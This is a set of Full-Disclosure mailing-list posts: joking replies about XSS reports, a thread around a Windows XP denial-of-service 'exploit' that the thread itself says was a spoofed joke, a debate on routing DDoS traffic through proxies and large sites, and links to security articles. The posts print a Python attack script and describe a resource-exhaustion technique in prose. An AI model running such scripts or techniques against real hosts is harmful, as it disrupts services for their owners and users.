Re: [Full-disclosure] PayPal.com XSS Vulnerability
Robert, Paypal is actually a cool company and im sure they are not worried about stiffing you on the money that is deserved from the bounty. Dan actually had some cool words to say about the situation. The XSS is not extremely complicated but it is good that you found it. Did they fix the issue before you disclosed it? T -- tuna 65617420646120706f6f20706f6f On Tue, May 28, 2013 at 11:16 AM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, May 28, 2013 at 10:47 AM, Kirils Solovjovs kirils.solovj...@kirils.com wrote: I suppose PayPal just wants to stay clear of any possible legal trouble/issues/complications. It's easier that way. Well, I suppose they are going to fix the issue pointed out by Kugler (and the additional issues from Parker). Do you think PayPal trolls lemonade stands run by children and takes their lemonade without paying to avoid possible legal problems? Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] phpMyBible 0.5.1 Mutiple XSS
When he announced to god that his bible contains xss his prayers remained unanswered. On Apr 22, 2012 8:23 PM, valdis.kletni...@vt.edu wrote: On Sun, 22 Apr 2012 19:59:46 -, Thor (Hammer of God) said: You dropped a FD on the BIBLE?? Dude, you're going straight to Hacker Hell! :) Wait, wouldn't that require that the unerring Word of God was buggy? ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows XP denial of service 0day found in CTF exercise
This is awesome! Its almost as awesome as a privilege escalation from root to root that works only in backtrack. -- tuna 65617420646120706f6f20706f6f On Tue, Apr 17, 2012 at 10:07, a...@infosecinstitute.com wrote: Guys, this is a fake release, someone spoofed my email and sent this out as a joke to mock the wicd release from last week. Please note that if you click on the links, there is nothing there concerning this. On 04/17/2012 02:48 AM, Adam Behnke wrote: Immunity Debugger Remote Denial of Service 0Day Tested against version 1.76 and 1.80 on Windows XP distributions Has not been tested for potential privilege escalation vectors. We first wrote about Immunity Debugger here: http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/ Discovered by a student that wishes to remain anonymous in the course CTF. This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous, he has contributed a python version of the 0day. A patch that can be applied to Windows has not been made available. You can find a python version of the exploit to copy and paste here: #!/usr/bin/python #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html import sys import os import time import getopt import socket class Error(Exception): def __init__(self, error): self.errorStr=error def __str__(self): return repr(self.errorStr) class Exploit(): def __init__(self, targetHost, targetPort): self.targetHost = targetHost def exploit(self, targetHost, targetPort): try: socket.inet_aton(targetHost) s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((targetHost,targetPort)) except socket.error: raise Error(Unable to exploit (Connect failed.)) sys.exit(0) # exploit try: s.sendto(\n\n\n, (targetHost, targetPort)) except: raise Error(Unable to exploit (Exploit failed.)) def usage(): print [!] Usage: print ( -h, --help ): print Print this message. print ( --targetHost= ): Target host. print --targetHost=127.0.0.1 print ( --targetPort= ): Target port. print --targetPort= def main(): print [$] Windows XP 0Day try: opts, args = getopt.getopt(sys.argv[1:], h, [help, targetHost=, targetPort=]) except getopt.GetoptError, err: # Print help information and exit: print '[!] Parameter error:' + str(err) # Will print something like option -a not recognized usage() sys.exit(0) targetHost=None targetPort=None for opt, arg in opts: if opt in (-h, --help): usage() sys.exit(0) elif opt ==--targetHost: targetHost=arg elif opt ==--targetPort: targetPort=arg else: # I would be assuming to say we'll never get here. print [!] Parameter error. usage() sys.exit(0) if not targetHost: print [!] Parameter error: targetHost not set. usage() sys.exit(0) if not targetPort: print [!] Parameter error: targetPort not set. usage() sys.exit(0) exploit = Exploit(targetHost, targetPort) print [*] Attempting to exploit: try: exploit.exploit(targetHost, int(targetPort)) except Error as error: print [!] Exploit Error: %s % (error.errorStr) exit(0) print [*] Exploit appears to have worked. # Standard boilerplate to call the main() function to begin # the program. if __name__=='__main__': main() ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9 K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW 4r6K58WTZ7qR2nTNKnQi =Uoev -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored
Re: [Full-disclosure] Arbitrary DDoS PoC
Just by glancing at the tool I would bet that this tool has the http headers misordered too. Its all good this tool would not be a very effective dos tool but keep up the good work and nice choice of the starfox quote. -- tuna 65617420646120706f6f20706f6f On Mon, Feb 13, 2012 at 08:48, adam a...@papsy.net wrote: I have to admit that I've only read the posts here, haven't actually followed the link, but in response to Gage: It entirely depends on how it's being done, specifically: what services/applications are being targeted and in what way. If he's proxying through big servers such as those owned by Facebook, Google, Wikipedia, etc: then it definitely does make a difference. You're assuming that his network speed would be the bottleneck, but to make that assumption, you first have to assume that he's actually waiting around for response data. Maybe it's too early to convey this in an understandable way, I don't know. An example scenario that would be effective though: imagine that you run a web server, also imagine that there's a resource (CPU/bandwidth) intensive script/page on that server. For the sake of discussion, let's assume that my home internet speed is 1/10 of your server. We can also probably assume that your server's network speed is 1/10 of Google's. If I can force Google's server to request that page, that automatically puts me at an advantage (especially if I close the connection before Google can send the response back to me). Even if you're correct about his particular script, the logic behind your response is flawed. In the above example, one could use multithreading to cycle requests to your server through Google, Facebook, Wikipedia, whoever. As soon as the request has been sent, the connection could be terminated. If that for some reason wouldn't work, the script could wait until one byte is received (e.g. the 2 in 200 OK) and close the connection then. At that point, the bandwidth/resources would have already been used. The bottom line is that you could easily use the above concepts (and likely what the OP has designed) to overpower a server/service while using very little resources of your own. It's all circumstantial anyway though. My overall point, specifics aside, is that being able to use Google or Facebook's resources against a target is definitely beneficial and has all kinds of advantages. On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom themadichi...@gmail.com wrote: Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target, its still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawnsand rely on shear numbers and/or superior resource exhaustion methods On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable, DNS, internet proxies, and many sites that make requests of user like Facebook or W3C, also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy of the last request. [1] https://github.com/lfamorim/barrelroll Cheers, Lucas Fernando Amorim http://twitter.com/lfamorim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___
Re: [Full-disclosure] Arbitrary DDoS PoC
Haha lets all ddos through tor.and proxies...thats how we speed shit up. -- tuna 65617420646120706f6f20706f6f On Mon, Feb 13, 2012 at 14:14, Sanguinarious Rose sanguiner...@occultusterra.com wrote: Ah what a wonderful gem of pure and real research into todays upcoming threats. Today is the day we learn to phear sites like xroxy.com because God forbid some of those silly kids using their 9001 proxies from their 56k dial-ups will over-run google, youtube, facebook, and the world! Dear God what will we do?!?!? When will it end! Think of the cute kittens you deprive us of evil proxy hackers! Today is the day I learned hackers can cast magick upon outgoing packets through proxies to somehow make them more bigger. I propose these are some kind of Christian hackers with God on their side to manipulate the very foundational laws of physics and electricity! Excuse me Mr. Amorim but what God alas do you pray to for this? Is it some kind of Christian Magick? On Sun, Feb 12, 2012 at 9:09 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable, DNS, internet proxies, and many sites that make requests of user like Facebook or W3C, also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy of the last request. [1] https://github.com/lfamorim/barrelroll Cheers, Lucas Fernando Amorim http://twitter.com/lfamorim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Verizon Wireless DNS Tunneling
To the guy saying that comcast requires an executable to authenticate you. Ha. You should prolly wipe your install. On Oct 7, 2011 10:41 AM, valdis.kletni...@vt.edu wrote: On Fri, 07 Oct 2011 10:36:39 EDT, James Wright said: That would probably explain why the Comcast service page downloads an executable to authenticate you. At that point they have control over the end user's machine and can either clear the DNS cache or force a reboot. That must suck if you're a non-Windows user. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Case of the Great Router Robbery
Whereas a home or SOHO router is unlikely to have much more value than what can be had on eBay, it?s a very different story when a corporate router is concerned. This article will look at what information can be gleaned from a stolen Cisco router, the mechanism available to reduce your exposure in these circumstances, and an evaluation of its effectiveness. http://resources.infosecinstitute.com/router-robbery/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New malware research posted on Resources at InfoSec Institute
The InfoSec Institute published an in-depth article on their Resources website this afternoon about a prominent new player on the malware scene. The series discusses the first malware to reliably attach x64 operating systems such as Windows Vista and Windows 7. This technically advanced malware bypasses various protective measures in various operation systems and exploits the normal boot process. You can find the first article, in the series of three, here: http://resources.infosecinstitute.com/tdss4-part-1/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
